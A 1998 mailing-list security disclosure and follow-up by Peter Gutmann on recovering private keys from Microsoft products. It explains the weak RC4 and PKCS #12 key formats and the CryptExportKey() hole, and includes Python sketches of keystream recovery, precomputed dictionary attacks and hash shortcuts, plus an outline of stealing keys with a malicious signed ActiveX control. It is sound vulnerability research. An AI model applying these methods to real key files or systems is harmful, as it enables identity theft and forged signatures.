3 February 1998: Update added below.
20 January 1998
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
To: cryptography@c2.net
Subject: [Long] How to recover private keys for various Microsoft products
Cc: cypherpunks@cyberpass.net
Date: Wed, 21 Jan 1998 04:29:26 (NZDT)
How to recover private keys for Microsoft Internet Explorer, Internet
Information Server, Outlook Express, and many others
- or -
Where do your encryption keys want to go today?
Peter Gutmann, <pgut001@cs.auckland.ac.nz>
Summary
-------
Microsoft uses two different file formats to protect users' private keys: the
original (unnamed) format, which was used in older versions of MSIE, IIS, and
other software and which is still supported for backwards-compatibility reasons
in newer versions, and the newer PFX/PKCS #12 format. Due to a number of
design and implementation flaws in Microsoft's software, it is possible to break
the security of both of these formats and recover users' private keys, often in
a matter of seconds. In addition, a major security hole in Microsoft's
CryptoAPI means that many keys can be recovered without even needing to break
the encryption. These attacks do not rely for their success on the presence of
weak, US-exportable encryption; they also affect US versions.
As a result of these flaws, no Microsoft internet product is capable of
protecting a user's keys from hostile attack. By combining the attacks
described below with widely-publicised bugs in MSIE which allow hostile sites
to read the contents of users' hard drives, or with an ActiveX control, a
victim can have their private key sucked off their machine and the encryption
which "protects" it broken at a remote site without their knowledge.
Once an attacker has obtained a user's private key in this manner, they have
effectively stolen their (digital) identity, and can use it to digitally sign
contracts and agreements, to recover every encryption session key it's ever
protected in the past and will ever protect in the future, to access private
and confidential email, and so on. The ease with which this attack can be
carried out represents a critical weakness which compromises all other
encryption components on web servers and browsers - once the private key is
compromised, all security services which depend on it are also compromised.
A really clever attacker might even do the following:
- Use (say) an MSIE bug to steal someone's ActiveX code signing key.
- Decrypt it using one of the attacks described below.
- Use it to sign an ActiveX control which steals other people's keys.
- Put it on a web page and wait.
On the remote chance that the ActiveX control is discovered (which is extremely
unlikely, since it runs and deletes itself almost instantly, and can't be
stopped even with the highest "security" setting in MSIE), the attack will be
blamed on the person the key was stolen from rather than the real attacker.
This demonstrates major problems in both Microsoft's private key security
(an attacker can decrypt, and therefore misuse, your private key), and ActiveX
security (an attacker can create an effectively unstoppable malicious ActiveX
control and, on the remote chance that it's ever discovered, ensure that
someone else takes the blame).
Background
----------
About a year ago I posted an article on how to break Netscape's (then) server
key encryption to the cypherpunks list (Netscape corrected this problem at
about the same time as I posted the article). However more than a year after
the code was published, and 2 1/2 years after a similar problem with Windows
.PWL file encryption was publicised, Microsoft are still using exactly the
same weak, easily-broken data format to "protect" users' private keys. To
break this format I simply dusted off my year-old software, changed the
"Netscape" strings to "Microsoft", and had an encryption-breaker which would
recover most private keys "protected" with this format in a matter of seconds.
In addition to the older format, newer Microsoft products also support the
PKCS #12 format (which they originally called PFX), which Microsoft render as
useless as the older format by employing the RC2 cipher with a 40-bit key. In
a truly egalitarian manner, this same level of "security" is used worldwide,
ensuring that even US users get no security whatsoever when storing their
private keys. However even RC2/40 can take a while to break (the exact
definition of "a while" depends on how much computing power you have available;
for most non-funded attackers it ranges from a few hours to a few days).
Fortunately, there are enough design flaws in PKCS #12 and bugs in Microsoft's
implementation to ensure that we can ignore the encryption key size. This has
the useful - to an attacker - side-effect that even if Microsoft switch to
using RC2/128 or triple DES for the encryption, it doesn't make the attacker's
task any more difficult. By combining the code to break the PKCS #12 format
with the code mentioned above which breaks the older format, we obtain a single
program which, when run on either type of key file, should be able to recover
the user's private keys from most files in a matter of seconds.
A (somewhat limited) example of this type of program is available in source
code form from http://www.cs.auckland.ac.nz/~pgut001/pubs/breakms.c. Because
it's meant as a proof-of-concept program it's somewhat crude, and restricted to
recovering passwords which are single dictionary words. Note: This does not
mean that using (say) two words as a password instead of one will protect your
private key. All it means is that I haven't bothered to write anything more
sophisticated - no doubt anyone who was serious about this could adapt
something like cracklib's password-generation rules and routines to provide a
more comprehensive and powerful type of attack. Similarly, by making trivial
changes to the key file data format it's possible to fool the program until
someone makes an equally trivial change to the program to track the format
change - this is meant as a demonstrator only, not a do-everything encryption
breaker.
To use the program, compile and invoke it with:
breakms <Microsoft key file> <word list file>
Here's what the output should look like (some of the lines have been trimmed a
bit):
File is a PFX/PKCS #12 key file.
Encrypted data is 1048 bytes long.
The password which was used to encrypt this Microsoft PFX/PKCS #12 file is
'orthogonality'.
Modulus = 00BB6FE79432CC6EA2D8F970675A5A87BFBE1AFF0BE63E879F2AFFB93644D [...]
Public exponent = 010001
Private exponent = 6F05EAD2F27FFAEC84BEC360C4B928FD5F3A9865D0FCAAD291E2 [...]
Prime 1 = 00F3929B9435608F8A22C208D86795271D54EBDFB09DDEF539AB083DA912D [...]
Prime 2 = 00C50016F89DFF2561347ED1186A46E150E28BF2D0F539A1594BBD7FE4674 [...]
Exponent 1 = 009E7D4326C924AFC1DEA40B45650134966D6F9DFA3A7F9D698CD4ABEA [...]
Exponent 2 = 00BA84003BB95355AFB7C50DF140C60513D0BA51D637272E355E397779 [...]
Coefficient = 30B9E4F2AFA5AC679F920FC83F1F2DF1BAF1779CF989447FABC2F5628 [...]
Someone sent me a test Microsoft key they had created with MSIE 3.0 and the
program took just a few seconds to recover the password used to encrypt the
file.
One excuse offered by Microsoft is that Windows NT has access control lists
(ACL's) for files, which can be used to protect against this attack and the one
described below. However this isn't notably useful: most users will be running
Windows '95, which doesn't have ACL's; of the small remainder using NT, most
won't bother setting the ACL's; and in any case, since the attack is coming
from software running as the current user (who has full access to the file),
the ACL's have no effect. The ACL issue is merely a red herring, and offers no
further protection.
Further Attacks (information provided by Steve Henson <shenson@bigfoot.com>)
---------------
There is a further attack possible which works because Microsoft's security
products rely on the presence of the Microsoft CryptoAPI, which has a wonderful
function called CryptExportKey(). This function hands over a user's private
key to anyone who asks for it. The key is encrypted under the current user, so
any other program running under that user can obtain their private key with a
single function call. For example, an ActiveX control on a web page could ask
for the current user's key, ship it out to a remote site, and then delete
itself from
the system leaving no trace of what happened, a bit like the mail.exe program I
wrote about 2 years ago which did the same thing for Windows passwords. If the
control is signed, there's no way to stop it from running even with the highest
security level selected in MSIE, and since it immediately erases all traces of
its existence the code signing is worthless.
Newer versions of the CryptoAPI which come with MSIE 4 allow the user to set a
flag (CRYPT_USER_PROTECTED) which specifies whether the key export function
should be protected with no protection (the default), user notification, or
password protection. However the way this is implemented makes it pretty much
useless.
Firstly, if the certificate request script used to generate the key doesn't set
this flag, you end up with the default of "no protection" (and the majority of
users will just use the default of "no protection" anyway). Although Microsoft
claim that "reputable CA's won't forget to set this flag", a number of CA's
tested (including Verisign) don't bother to set it (does this mean that
Microsoft regard Verisign as a disreputable CA? :-). Because of this, they
don't even provide the user with the option of selecting something other than
"no security whatsoever".
In addition at least one version of CryptoAPI would allow the "user
notification" level of security to be bypassed by deleting the notification
dialog resource from memory so that the call would quietly fail and the key
would be exported anyway (this is fairly tricky to do and involves playing with
the CPU's page protection mechanism, there are easier ways to get the key than
this).
Finally, the "password protection" level of security asks for the password a
whopping 16 (yes, *sixteen*) times when exporting the key, even though it only
needs to do this once. After about the fifth time the user will probably click
on the "remember password" box, moving them back to zero security until they
reboot the machine and clear the setting, since the key will be exported with
no notification or password check once the box is clicked.
To check which level of security you have, try exporting your key certificate.
If there's no warning/password dialog, you have zero security for your key, and
don't even need to use the encryption-breaking technique I describe elsewhere
in this article. Any web page you browse could be stealing your key (through
an embedded ActiveX control) without you ever being aware of it.
Details on Breaking the Older Format
------------------------------------
The Microsoft key format is very susceptible to both a dictionary attack and to
keystream recovery. It uses the PKCS #8 format for private keys, which
provides a large amount of known plaintext at the start of the data, in
combination with RC4 without any form of IV or other preprocessing (even though
PKCS #8 recommends that PKCS #5 password-based encryption be used), which means
you can recover the first 100-odd bytes of key stream with a simple XOR (the
same mistake they made with their .PWL files, which was publicised 2 1/2 years
earlier). Although the password is hashed with MD5 (allowing them to claim the
use of a 128-bit key), the way the key is applied provides almost no security.
This means two things:
1. It's very simple to write a program to perform a dictionary attack on the
server key (it originally took me about half an hour using cryptlib,
http://www.cs.auckland.ac.nz/~pgut001/cryptlib/, another half hour to rip
the appropriate code out of cryptlib to create a standalone program, and a
few minutes to retarget the program from Netscape to Microsoft).
2. The recovered key stream from the encrypted server key can be used to
decrypt any other resource encrypted with the server password, *without
knowing the password*. This is because there's enough known plaintext
(ASN.1 objects, object identifiers, and public key components) at the start
of the encrypted data to recover large quantities of key stream. This means
that even if you use a million-bit encryption key, an attacker can still
recover at least the first 100 bytes of anything you encrypt without needing
to know your key (Frank Stevenson's glide.exe program uses this to recover
passwords from Windows .PWL files in a fraction of a second).
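The keystream-recovery attack in point 2 can be sketched in a few lines. This
is a toy illustration, not the breakms.c code: the RC4 implementation is
standard, but the "key file" contents and the sample known plaintext are made
up for the example.

```python
# Sketch of the keystream-recovery attack: RC4 with a fixed key and no IV
# produces the same keystream for every encryption, so known plaintext
# XORed with ciphertext yields the keystream, which then decrypts the
# start of anything else encrypted under the same password.
from hashlib import md5

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (no IV, no keystream discard), as used by the old format."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

password = b"orthogonality"
key = md5(password).digest()        # the "128-bit" key, applied badly

# The start of a PKCS #8 PrivateKeyInfo is predictable (ASN.1 header,
# version, algorithm OID); simulated here as 16 bytes of known plaintext.
known_plaintext = bytes.fromhex("300d020100300806052b0e03021a0500")
ciphertext1 = rc4(key, known_plaintext + b"...private key bits...")

# Attacker: XOR the known plaintext out of the ciphertext -> keystream.
keystream = bytes(k ^ c for k, c in zip(known_plaintext, ciphertext1))

# The same keystream decrypts the start of *any* other data encrypted
# under the same password, without ever learning the password itself.
ciphertext2 = rc4(key, b"another secret..")
recovered = bytes(k ^ c for k, c in zip(keystream, ciphertext2))
print(recovered)
```

Note that the attacker never runs the password hash at all in the second
step; the keystream alone is enough.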
The problem here is caused by a combination of the PKCS #8 format (which is
rather nonoptimal for protecting private keys) and the use of RC4 to encrypt
fixed, known plaintext. Since everything is constant, you don't even need to
run the password-transformation process more than once - just store a
dictionary of the resulting key stream for each password in a database, and
you can break the encryption with a single lookup (this would be avoided by
the use of PKCS #5 password-based encryption, which iterates the key setup and
uses a salt to make a precomputed dictionary attack impossible. PKCS #5
states that its primary intended application is for protecting private keys,
but Microsoft (and Netscape) chose not to use this and went with straight RC4
encryption instead). This is exactly the same problem which came up with
Microsoft's .PWL file encryption in 1995, and yet in the 2 1/2 years since I
exposed this problem they still haven't learnt from their previous mistakes.
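The single-lookup attack described above can be sketched as follows. Again
this is an illustration rather than real attack code: the wordlist and the
fixed ASN.1 header bytes are invented for the example, and the RC4 code is
the textbook algorithm.

```python
# Sketch: with no salt and no iteration count, the password-to-keystream
# mapping is constant across all files, so it can be precomputed once and
# any key file broken with a single table lookup.
from hashlib import md5

def rc4(key, data):
    S = list(range(256)); j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray(); i = j = 0
    for c in data:
        i = (i + 1) & 0xFF; j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

KNOWN = bytes.fromhex("300d020100300806052b0e03021a0500")  # fixed header

# One-off precomputation: map first keystream bytes back to the password.
# A salt and iteration count (as PKCS #5 specifies) would force this table
# to be rebuilt per file; without them it works against every file ever made.
wordlist = [b"password", b"letmein", b"orthogonality", b"qwerty"]
table = {rc4(md5(w).digest(), bytes(len(KNOWN))): w for w in wordlist}

# Per-file "attack": XOR the predictable plaintext out of the ciphertext
# and look the keystream up -- no per-password work at all.
ciphertext = rc4(md5(b"orthogonality").digest(), KNOWN + b"key material")
stream = bytes(k ^ c for k, c in zip(KNOWN, ciphertext))
print(table.get(stream))
```

With a real dictionary the table costs one pass to build, after which every
key file in this format falls to a hash lookup.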
For the curious (and ASN.1-aware), here's what the data formats look like.
First there's the outer encapsulation which Microsoft use to wrap up the
encrypted key:
  MicrosoftKey ::= SEQUENCE {
      identifier              OCTET STRING ('private-key'),
      encryptedPrivateKeyInfo EncryptedPrivateKeyInfo
      }
Inside this is a PKCS #8 private key:
  EncryptedPrivateKeyInfo ::= SEQUENCE {
      encryptionAlgorithm EncryptionAlgorithmIdentifier,
      encryptedData       EncryptedData
      }

  EncryptionAlgorithmIdentifier ::= AlgorithmIdentifier

  EncryptedData ::= OCTET STRING
Now the EncryptionAlgorithmIdentifier is supposed to be something like
pbeWithMD5AndDES, with an associated 64-bit salt and iteration count, but
Microsoft (and Netscape) ignored this and used straight rc4 with no salt or
iteration count. The EncryptedData decrypts to:
  PrivateKeyInfo ::= SEQUENCE {
      version             Version,
      privateKeyAlgorithm PrivateKeyAlgorithmIdentifier,
      privateKey          PrivateKey,
      attributes    [ 0 ] IMPLICIT Attributes OPTIONAL
      }

  Version ::= INTEGER

  PrivateKeyAlgorithmIdentifier ::= AlgorithmIdentifier

  PrivateKey ::= OCTET STRING

  Attributes ::= SET OF Attribute
(and so on; I haven't bothered going down any further). One thing
worth noting is that Microsoft encode the AlgorithmIdentifier incorrectly by
omitting the parameters; these should be encoded as a NULL value if there are
no parameters. In this they differ from Netscape, indicating that the two
companies managed to come up with the same broken key storage format
independently. Wow.
For people picking apart the inner key, Microsoft also encode their ASN.1
INTEGERs incorrectly, so you need to be aware of this when reading out the
data.
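For comparison, here is what the correct DER looks like for the two constructs
mentioned above. The exact nature of Microsoft's INTEGER bug isn't spelled out
here; a classic mistake (shown below as an assumption, not a claim about their
code) is omitting the leading zero byte that stops a positive value with its
high bit set from being read back as negative.

```python
# Correct DER encoding of an INTEGER and of an rsaEncryption
# AlgorithmIdentifier, for readers picking apart the inner key.

def der_integer(value: int) -> bytes:
    """Correct DER INTEGER: minimal big-endian two's-complement, with a
    leading 0x00 pad when the top bit would make the value negative."""
    body = value.to_bytes((value.bit_length() + 7) // 8 or 1, "big")
    if body[0] & 0x80:
        body = b"\x00" + body          # the easily-forgotten pad byte
    return bytes([0x02, len(body)]) + body

# rsaEncryption AlgorithmIdentifier: the parameters field must be an
# explicit ASN.1 NULL (05 00), not simply left out as Microsoft do.
oid_rsa = bytes.fromhex("06092a864886f70d010101")
alg_id  = bytes([0x30, len(oid_rsa) + 2]) + oid_rsa + b"\x05\x00"

print(der_integer(0x7F).hex())   # no pad needed below 0x80
print(der_integer(0x80).hex())   # pad byte required from 0x80 up
print(alg_id.hex())
```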
Details on Breaking the PFX/PKCS #12 Format
-------------------------------------------
The PFX/PKCS #12 format is vastly more complex (and braindamaged) than the
older format. You can find an overview of some of the bletcherousness in this
format at http://www.cs.auckland.ac.nz/~pgut001/pfx.html. After Microsoft
originally designed the format (calling it PFX) and presented it to the world
as a fait accompli, cleanup crews from other companies rushed in and fixed some
of the worst problems and security flaws. However by this time Microsoft had
already shipped implementations which were based on the earlier version with
all its flaws and holes, and didn't want to change their code any more. A
side-effect of this was that, to be compatible, other vendors had to copy
Microsoft's bugs rather than produce an implementation in accordance with the
standard. Newer versions of the standard have now been amended to define the
implementation bugs as a part of the standard.
Anyway, as a result of this it's possible to mount three independent types of
attack on Microsoft's PFX/PKCS #12 keys:
1. Attack the RC2/40 encryption used in all versions, even the US-only one.
2. Attack the MAC used to protect the entire file. Since the same password is
used for the MAC and the encrypted key, recovering the MAC password also
recovers the password used to encrypt the private key. The cleanup crews
added a MAC iteration count to make this attack harder, but Microsoft
ignored it.
3. Attack the private key encryption key directly. Like the MAC, this also
has an iteration count. Microsoft don't use it.
Even if one of these flaws is fixed, an attacker can simply switch over and
concentrate on a different flaw.
I decided to see which one could be implemented the most efficiently.
Obviously (1) was out (you need to perform 2^39 RC2 key schedules on average
to find the key), which left (2) and (3). With the refinements I'm about to
describe, it turns out that an attack on the private key encryption is
significantly more efficient than an attack on the MAC.
To understand how the attack works, you need to look at how PKCS #12 does its
key processing. The original PFX spec included only some very vague thoughts
on how to do this. In later PKCS #12 versions this evolved into a somewhat
garbled offshoot of the PKCS #5 and TLS key processing methods. To decrypt
data which is "protected" using the PKCS #12 key processing, you need to do the
following:
- construct a 64-byte "diversifier" (which differs depending on whether you
  want to set up a key or an IV) and hash it;
- stretch the salt out to 64 bytes and hash it after the diversifier hash;
- stretch the password out to 64 bytes (using incorrect processing of the
  text string; this is one of Microsoft's implementation bugs which has
  now become enshrined in the standard) and hash it after the salt hash;
- complete the hash and return the resulting value as either the key or the
  IV, depending on the diversifier setting.

(It's actually rather more complex than that; this is a stripped-down version
which is equivalent to what Microsoft use.)
This process is carried out twice, once for the key and once for the IV. The
hashing is performed using SHA-1, and each of the two invocations of the
process requires 4 passes through the SHA-1 compression function, for a total
of 8 passes through the function. Because the PKCS #12 spec conveniently
requires that all data be stretched out to 64 bytes, which happens to be the
data block size for SHA-1, there's no need for the input processing which is
usually required for SHA-1 so we can strip this code out and feed the data
directly into the compression function. Thus the compression function (along
with the RC2 key setup) is the limiting factor for the speed of an attack.
Obviously we want to reduce the effort required as much as possible.
As it turns out, we can eliminate 6 of the 8 passes, cutting our workload by
75%. First, we observe that the diversifier is a constant value, so
instead of setting it up and hashing it, we precompute the hash and store the
hash value. This eliminates the diversifier, and one pass through SHA-1.
Next, we observe that the salt never changes for the file being attacked, so
again instead of setting it up and hashing it, we precompute the hash and
store the hash value. This eliminates the salt, and another pass
through SHA-1.
Finally, all that's left is the password. This requires two passes through
the compression function, one for the password (again conveniently stretched
to 64 bytes) and a second one to wrap up the hashing.
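The precomputation trick can be sketched with hashlib's copy(), which freezes
the SHA-1 state after the two constant blocks. The diversifier and salt values
below are placeholders, not the real PKCS #12 constants; the point is the
structure of the computation, not the exact bytes.

```python
# Sketch of the 8-passes-down-to-2 optimisation: hash the constant
# diversifier and salt blocks once, then resume from that frozen state
# for every password guess.
from hashlib import sha1

diversifier = bytes([1]) * 64          # constant per key/IV purpose
salt        = (b"SALTSALT" * 8)[:64]   # constant for the file under attack

# Precompute once: two SHA-1 compression passes over constant data.
midstate = sha1()
midstate.update(diversifier)
midstate.update(salt)

def derive(password_stretched: bytes) -> bytes:
    """Per-guess work: only the password block plus finalisation,
    i.e. two compression passes instead of four."""
    h = midstate.copy()                # resume from the frozen state
    h.update(password_stretched)
    return h.digest()

def derive_naive(pw: bytes) -> bytes:
    """The full four-pass derivation, for comparison."""
    h = sha1()
    h.update(diversifier); h.update(salt); h.update(pw)
    return h.digest()

pw = (b"orthogonality\x00" * 5)[:64]      # password stretched to 64 bytes
assert derive(pw) == derive_naive(pw)     # same result, half the hashing
print(derive(pw).hex()[:16])
```

Because SHA-1 processes input in 64-byte blocks, the frozen state after the
diversifier and salt is exactly the state the full derivation would reach,
so the shortcut is bit-for-bit identical to the real thing.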
In theory we'd need to repeat this process twice, once to generate the
decryption key and a second time to generate the decryption IV which is used
to encrypt the data in CBC mode. However the start of the decrypted plaintext
is:
  SEQUENCE {
      SEQUENCE {
          OBJECT IDENTIFIER,
          ...
and the SEQUENCE is encoded as 30 82 xx xx (where xx xx are the length
bytes). This means the first 8 bytes will be 30 82 xx xx 30 82 xx xx, and
will be followed by the object identifier. We can therefore skip the first 8
bytes and, using them as the IV, decrypt the second 8 bytes and check for the
object identifier. This eliminates the second PKCS #12 key initialisation
call which is normally required to generate the IV.
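The skip-the-IV trick follows directly from how CBC decryption works: each
plaintext block depends only on the key, its own ciphertext block, and the
previous ciphertext block. The sketch below uses a toy XOR "block cipher" as a
stand-in for RC2 (the real cipher isn't in the standard library), but the
structure of the check is the same.

```python
# Sketch: decrypt ciphertext block 2 using ciphertext block 1 as the IV,
# then check for the predictable ASN.1 pattern. The real IV derived from
# the password is never needed.
BLOCK = 8

def toy_encrypt(key, block):   # toy stand-in for RC2 encryption
    return bytes(b ^ k for b, k in zip(block, key))

def toy_decrypt(key, block):   # XOR is its own inverse
    return bytes(b ^ k for b, k in zip(block, key))

def cbc_encrypt(key, iv, data):
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        block = toy_encrypt(key, bytes(x ^ p for x, p in
                                       zip(data[i:i+BLOCK], prev)))
        out += block
        prev = block
    return out

# The plaintext starts 30 82 xx xx 30 82 xx xx, then an object identifier
# (tag 06).  Values below are invented for the example.
key, iv = b"deriveds", b"derivedi"        # both derived from the password
plain   = bytes.fromhex("3082010430820100") + b"\x06\x09" + b"rest..."
padded  = plain + bytes(-len(plain) % BLOCK)
ct      = cbc_encrypt(key, iv, padded)

# Attacker: P2 = D(C2) XOR C1, so skip the first 8 bytes, use them as the
# IV, and check the second block for the object identifier tag.
block2 = bytes(d ^ c for d, c in zip(toy_decrypt(key, ct[8:16]), ct[:8]))
print(block2[0] == 0x06)   # candidate key accepted without knowing the IV
```

This is why the second key-derivation call (for the IV) can be dropped
entirely, halving the per-guess work on top of the other savings.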
As this analysis (and the program) shows, Microsoft managed to design a
"security" format in which you can eliminate 75% of the encryption processing
work while still allowing an attack on the encrypted data. To make it even
easier for an attacker, they then dumbed the key down to only 40 bits, even in
the US-only version of the software. In fact the key size doesn't really have
any effect on security: even if they used 128-bit RC2 or triple DES or
whatever, it would provide no extra security thanks to the broken key
processing.
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
To: cryptography@c2.net
Subject: An update on MS private key (in)security issues
Date: Wed, 4 Feb 1998 01:36:20 (NZDT)
A fortnight ago I posted a message exposing a number of weaknesses in the way
various Microsoft security products handle users' private keys. A few days
before I was due to vanish for a security conference (where it was very
difficult to contact me), the article started getting a bit of attention. This
is a general response which clarifies several issues relating to the original
message.
First, Russ Cooper (moderator of the NT Bugtraq mailing list) made some wildly
inaccurate claims about the article. I've had a bit of feedback which
indicated that it wasn't even worth dignifying this stuff with a response but
I've written one anyway, at least for the original NT Bugtraq messages he
posted (the stuff he put on a web page is just more of the same). You can find
it at http://www.cs.auckland.ac.nz/~pgut001/pubs/breakms2.txt (even if you
don't want to plough through the whole thing, you might want to read the last
two paragraphs for a giggle).
After this, Microsoft's spin doctors leaped into action and posted a response to
the article. I've replied to this one in a bit more detail, since it raises
several important issues.
Comments on Microsoft's Response
--------------------------------
>Microsoft's Response to Recent Questions on the Recovery of Private Keys from
>various Microsoft Products
>[...]
>With the exception of the details about a possible PKCS-12 attack, all the
>issues raised in the recent discussions are specifically aimed at Microsoft's
>base CSPs, not at CryptoAPI. The base CSPs are the royalty-free,
>software-based CSPs provided with Windows NT 4.0, Windows 95, and Internet
>Explorer. These attacks do not apply in general to other CryptoAPI CSPs and do
>not indicate any fundamental concerns with the security of the CryptoAPI
>architecture or applications built upon it.
This statement is mere obfuscation. As Microsoft have said, every single
(recent) copy of Windows NT, Windows '95, and MSIE (and, presumably, other
products like IIS and Outlook, which rely on them) ships with these CSP's;
therefore every recent system comes with this security hole installed by
default.
In addition, the CryptExportKey() function is a standard CryptoAPI function,
which is described by Microsoft with the text "The CryptExportKey function is
used to export cryptographic keys out of a cryptographic service provider in a
secure manner" (obviously some new use of the term "secure" with which I wasn't
previously familiar). There's nothing in there that says "Only the Microsoft
CSP's support this" (some may not support it, but by Microsoft's own admission
the default used on any recent system does indeed exhibit this flaw).
>Microsoft products do not "store" private key material using PKCS-12, contrary
>to recent descriptions on the Internet.
I was unfortunately somewhat unclear in my article; I've fixed up the online
version at http://www.cs.auckland.ac.nz/~pgut001/pubs/breakms.txt. To
summarise: if you want to get at an exported key stored on disk, you can use
the pre-4.0 key file/PKCS #12 key file flaws. If you want to get at the
current user's key, you can use the CryptExportKey() flaw.
>The example of breaking a PKCS-12 data blob, which was given in discussion on
>the Internet, is not an attack on the "weak" cryptography of PKCS-12. Rather,
>it is simply a dictionary attack (long known and well understood in
>cryptography),
This statement is accurate. As Microsoft have said, dictionary attacks have
been known to the computer industry for a long, long time (several decades).
For example, the Unix password encryption uses 25 iterations of DES to protect
users' passwords from dictionary attacks (this is rather inadequate now, but
was appropriate more than two decades ago when it was introduced).
If this is a well-known flaw which the entire industry has known about for
decades, why are Microsoft's very latest "security" products so extremely
vulnerable to it? As I mentioned in my writeup, I published an attack on the
exact format used in older MS products more than 1 1/2 years ago, but Microsoft
made no attempt to fix this problem at the time. It wasn't until I published
the current writeup that they finally addressed it.
>One statement by the original poster argues that Microsoft managed to design a
>security format that actually makes it easier to break into the protected
>data. As stated above, a number of well respected companies were involved
>extensively in the design and review of PKCS-12 before it became a standard.
The problem is that Microsoft ignored the other companies' recommendations for
increasing security. I'll refer people back to the original writeup for
mention of the various security features which were added to PKCS #12 and
subsequently ignored by Microsoft. PKCS #12 is just a basic modification of
PFX, which was a purely Microsoft invention, and Microsoft's implementation of
PKCS #12 does indeed make it very easy to perform the attack I described
(you'd have to read my writeup for the full technical details, in which I
describe the individual flaws which, as each is exploited in turn, make it
progressively easier to recover a user's private key).
In addition (as I mentioned in my original message), Microsoft use RC2/40 to
encrypt the private keys, which means that no matter how good a password you
choose, the default PKCS #12 format private key produced by MSIE can be
recovered in a few days with fairly modest computing power. There already
exists a Windows screen saver which will recover RC2/40 keys for S/MIME
messages, and the prize of an RSA private key is a much higher motivating
factor than the "Hello, how are you?" typically found in an S/MIME message. As
Microsoft point out, Netscape can indeed handle RC2/40-encrypted files, however
they usually use triple DES and not RC2/40 (they encrypt the private key
components - the really valuable part of the PKCS #12 payload - with triple DES
and the other odds and ends with RC2/40). Since Netscape also iterate the
password and MAC processing, they aren't vulnerable to the attacks which the
Microsoft software is vulnerable to, even though both are based on the same
PKCS #12 standard.
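The countermeasure that makes Netscape's PKCS #12 files resistant - a per-file
salt plus an iterated key derivation - can be sketched as below. This is a
PBKDF1-style construction for illustration only; the iteration count and salt
sizes are invented, not Netscape's actual parameters.

```python
# Sketch of why a salt and an iteration count defeat both attacks: the
# salt makes a precomputed dictionary useless (it would have to be
# rebuilt per file), and the iterations multiply the per-guess cost.
from hashlib import sha1
import os

def slow_kdf(password: bytes, salt: bytes, iterations: int = 2000) -> bytes:
    """PBKDF1-like derivation: hash password+salt, then iterate."""
    h = sha1(password + salt).digest()
    for _ in range(iterations - 1):    # attacker pays this per guess
        h = sha1(h).digest()
    return h

salt = os.urandom(8)                   # different for every key file
k1 = slow_kdf(b"orthogonality", salt)
k2 = slow_kdf(b"orthogonality", os.urandom(8))
print(k1.hex()[:16], k2.hex()[:16])    # same password, different keys
```

An attacker now has to run the full iterated derivation for every candidate
password against every file, instead of a single table lookup.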
>Exploiting Internet Explorer
>
>One of the fundamental requirements to perform any possible cryptographic
>attack discussed in the recent postings is the assumption that a malicious
>entity could somehow access to data on a user's computer system, without the
>permission or knowledge of the user. This is a large leap of faith.
>
>Users that are using Public Key Certificates today are generally sophisticated
>and savvy users,
Bwahahahahaha!
Sorry, I guess I should explain that in more precise terms. Now I'm not trying
to claim that the average Win95 user isn't as sophisticated and savvy as
Microsoft seem to think, or that relying entirely on the sophistication of the
average Win95 user for security is a dangerous move. However these statements
do seem to completely ignore the reality of the situation. Let me go into the
background of the weaknesses a bit further.
When I tested the weaknesses, I asked some "guinea pig" users to send me their
exported keys, with the promise that I'd destroy the keys and not keep any
record of where the keys came from and so on. Because of this I can't give
exact figures, however here are a few data points:
- More than half the keys (I can't remember the exact figure) were in the
older, pre-4.x format. This indicates that the majority of users (or at
least of the crypto-using guinea pigs) are still running old versions of MSIE
which contain a number of widely-publicised problems, including precisely the
weaknesses required to run arbitrary code on the machine or read files off
the machine. One of the respondents commented that the key was "the key I
use with Outlook"; I'm not sure what that says about the origins of the key.
Another key was one used with IIS for a web site which runs an online
commerce service that processes credit-card based orders. This must have
been an older version of IIS since the key was in the pre-4.x format.
- When I asked two of the people why they were still using an old version, the
responses were "It came installed with the machine when we bought it" and "It
does what I want, so I haven't upgraded". I expect most users of the older
version would have a similar reason for using it.
- In a company of 20 people (some of whom participated in this test), only two
were running 4.x. These people are all highly competent software developers
(presumably this includes them in the group of "sophisticated and savvy
users" which MS were referring to); however, none of the remaining 18 wanted
to risk installing MSIE 4 because of the extent to which it messed with
their system, possibly jeopardising their development work. Therefore most
of these "sophisticated and savvy users" were still running old, insecure
versions of MSIE, and weren't going to upgrade any time soon.
- For the two remaining 4.x users in the company, both are still using
straight, unpatched 4.0 because they considered it painful enough to download
all of 4.0 and they didn't want to bother with an upgrade just yet. This
makes them vulnerable to the bug pointed out in the l0pht advisory.
- When I informed one of the guinea pigs of the recovered password, his
response was "Now I'll have to change my login password" (the others
generally restricted themselves to some variation of "Oops"). This comment
confirms that users do indeed sometimes use their login password to protect
their private keys, so that a successful attack recovers not only their
private keys but their login password as well.
- One respondent commented that most of the code they downloaded from the net
was unsigned, but they ran it anyway. This is probably typical of the
average user.
I've only been back for two days, but so far I haven't managed to find anyone
who has applied all the latest patches and kludges which would make their
system immune to these problems. This includes at least one person who has a
code signing key which could be used to sign malicious ActiveX controls.
Therefore all of the guinea pigs could in theory have their private keys
stolen.
>Attacks against Authenticode signing keys
>
>[...]
>
>However, it is extremely unlikely anyone could be successful with a simplistic
>strategy for stealing Authenticode signing keys and then using them.
See my comments above about this. I could, right now, obtain at least one
Authenticode signing key with which I could create a malicious ActiveX control.
I'm sure that if I were serious about this I could obtain a number of others.
>Second, anyone signing code using Authenticode technology is extremely
>unlikely to leave their key material sitting on an end user machine routinely
>used for browsing the Internet.
I see no basis for this claim. Every developer I know uses the same machine
for both code development and web browsing (in fact a number of users keep a
copy of MSIE or Netscape permanently running on their machine so that they'll
have something to do between compiles). Microsoft's statement seems to imply
that users will be running two machines, one dedicated entirely to web browsing
and the other to code signing. I find this extremely unlikely.
>Attacks on Encrypted Key material
>
>There is some confusion over the algorithms and methods that Microsoft uses to
